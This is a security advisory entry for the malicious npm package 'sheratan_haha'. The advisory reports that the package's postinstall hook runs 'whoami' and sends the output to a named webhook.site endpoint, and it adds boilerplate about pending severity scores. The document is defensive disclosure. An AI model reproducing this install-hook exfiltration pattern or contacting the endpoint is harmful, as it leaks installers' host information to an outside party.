Vulnerability
Malicious code in sheratan_haha (npm)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (6b473b40e0c041d34e85161ed8c91e0e00d006a0822698a0d3994876cb685ddd) On `npm install`, the package's declared postinstall hook (`node postinstall.js`) runs `whoami` on the installer's machine and POSTs the output to a hardcoded webhook.site endpoint (`https://webhook.site/0ea9eb45-3ede-4cf0-9ea9-2b8d700272e7`) via `https.request`. The package advertises itself as 'A simple date formatting utility' but ships no library code consistent with that purpose — the only behavior on install is host fingerprinting and exfiltration to an attacker-controlled URL. Metadata is placeholder-shaped (empty author, generic description, name `sheratan_haha`), consistent with a dependency-confusion / recon PoC. Installing this package leaks the installer's OS username to an external endpoint controlled by the publisher.
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs. Last record update .
For interim severity, fall back on KEV / EXPLOIT signals and the EPSS percentile (lower panel). Re-check this CVE after one cron tick — the score lands automatically when the source publishes.
FIRST.org publishes EPSS daily. Coverage isn't universal — pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands. Score will appear within 24 hours of the next EPSS pull.
No exploitation, limited impact or prevalence